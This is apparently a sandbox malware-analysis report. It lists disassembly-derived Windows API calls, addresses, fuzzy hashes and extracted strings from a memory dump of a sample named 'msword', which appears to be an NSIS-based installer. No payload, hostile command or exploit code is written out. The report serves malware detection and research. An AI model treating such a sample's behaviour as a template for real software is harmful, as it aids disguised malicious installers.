                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: Char$Next$CreateDirectoryPrev
                                          • String ID:
                                          • API String ID: 4115351271-0
                                          • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                          • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                          • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                          • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                          APIs
                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                          • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                          • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                          • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                          APIs
                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                          • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                          • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                          • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                          APIs
                                          • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                          • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                          • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                          • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                          • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                          • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                          • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                          APIs
                                          • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                          • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                          • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                          • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                          • DeleteObject.GDI32(?), ref: 00404AA5
                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                          • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                          • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                          • GlobalFree.KERNEL32(?), ref: 00404DD8
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                          • ShowWindow.USER32(?,00000000), ref: 00404F75
                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                          • ShowWindow.USER32(00000000), ref: 00404F87
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                          • String ID: $ @$M$N
                                          • API String ID: 1638840714-3479655940
                                          • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                          • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                          • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                          • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                          APIs
                                          • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                          • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                          • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                          • lstrlenW.KERNEL32(?), ref: 00406D58
                                          • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                          • FindClose.KERNEL32(?), ref: 00406E5F
                                          Strings
                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                          • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                          • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                          • ptF, xrefs: 00406D1A
                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                          • \*.*, xrefs: 00406D2F
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                          • API String ID: 2035342205-1650287579
                                          • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                          • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                          • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                          • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                          APIs
                                          • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                          • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                          • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                          • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                          • SetWindowTextW.USER32(?,?), ref: 004045AF
                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                          • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                          • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                          • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                            • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                            • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                            • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                            • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                            • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                            • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                          • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004283D1,76F923A0,00000000), ref: 00406902
                                          • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                          • String ID: F$A
                                          • API String ID: 3347642858-1281894373
                                          • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                          • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                          • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                          • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                          APIs
                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                          • CloseHandle.KERNEL32(?), ref: 00407212
                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                          • API String ID: 1916479912-1189179171
                                          • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                          • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                          • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                          • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                          APIs
                                          • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004283D1,76F923A0,00000000), ref: 00406902
                                          • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                          • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                          • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                          • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,004283D1,76F923A0,00000000), ref: 00406A73
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                          • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                          • API String ID: 3581403547-1792361021
                                          • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                          • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                          • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                          • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                          APIs
                                          • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                          Strings
                                          • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: CreateInstance
                                          • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                          • API String ID: 542301482-1377821865
                                          • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                          • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                          • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                          • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                          • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                          • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                          • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                          • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                          • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                          • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                          • lstrlenW.KERNEL32(?), ref: 004063F8
                                          • GetVersionExW.KERNEL32(?), ref: 00406456
                                            • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                          • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                          • GlobalFree.KERNEL32(?), ref: 00406509
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
